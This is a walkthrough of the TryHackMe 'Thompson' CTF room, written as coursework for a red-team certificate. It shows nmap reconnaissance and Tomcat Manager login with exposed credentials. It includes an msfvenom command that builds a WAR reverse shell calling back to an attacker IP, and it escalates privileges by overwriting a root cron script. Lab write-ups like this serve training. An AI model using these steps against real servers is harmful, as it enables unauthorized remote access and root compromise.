TryHackMe | Thompson Walkthrough
boot2root machine for FIT and bsides guatemala CTF
This is a relatively easy CTF room that requires knowledge of using reverse shells and corn jobs.
This walkthrough is written as a part of Master's certificate in cybersecurity (Red Team) that I am pursuing from HackeU.
Reconnaissance
Starting with a regular nmap scan
nmap -sS -sV -A <IP>
We discover that we have 3 ports open
22/tcp — ssh — OpenSSH
8009/tcp — ajp13 — Apache Jsery
8080/tcp — http — Apache Tomcat
As we have a port 8080 open and an HTTP service running so there is a webpage also available.
After some digging when i cliked on the Manage App button it showed me a login dialog box .
I didn't have any credentials but when I closed the box it redirected me a page that showed the XML code for the credentials which I used to log in.
After login, we see the admin dashboard for the website.
we also have an upload option with only fir .war files. So I used msfvenom to create a reverse shell payload with a .war extension
After uploading the file we see it on the webpage and when we click it , it gives a reverse connection to our netcat listener.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f war > back.war
Finding Flags
Found the first flag in the/home/jack directory
Privilege escalation
We also see an id.sh file and after some digging, I found out that a cronjob is associated with id.sh which executes the command in the file every minute.
cat /etc/crontab
using this to escalate our privileges.
As the .sh file will run after every 1 minute we can write our command in it and just get our command executed.
echo “cp /root/root.txt /home/jack/root.txt” > id.sh
After one minute we have our command executed successfully
AND we completed the room. Do leave some claps if this helped you in any way.
